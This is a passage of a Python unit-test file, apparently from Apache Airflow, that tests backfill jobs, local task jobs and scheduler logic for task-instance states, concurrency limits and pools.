dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for none (reset) state
ti.set_state(State.NONE, session)
ti_status.started[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.started) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag()
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type dags_folder: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because previously scheduler._execute_task_instances only
# checked the number of tasks once, so if concurrency was 3
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(2, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING], session=session))
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(3, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING, State.QUEUED], session=session))
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because previously scheduler._execute_task_instances only
# checked the number of tasks once, so if concurrency was 3
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
def test_change_state_for_tis_without_dagrun(self):
dag = DAG(
dag_id='test_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag2 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_dont_change',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag2,
owner='airflow')
dag3 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_no_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag3,
owner='airflow')
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id='dummy', session=session)
ti.state = State.SCHEDULED
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti = dr.get_task_instance(task_id='dummy', session=session)
ti.refresh_from_db(session=session)
self.assertEqual(ti.state, State.SCHEDULED)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEquals(ti3.state, State.NONE)
dr.refresh_from_db(session=session)
dr.state = State.FAILED
# why o why
session.merge(dr)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti.refresh_from_db(session=session)
self.assertEqual(ti.state, State.NONE)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
processor.get_last_finish_time.return_value = None
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler._execute_helper(processor_manager=processor)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
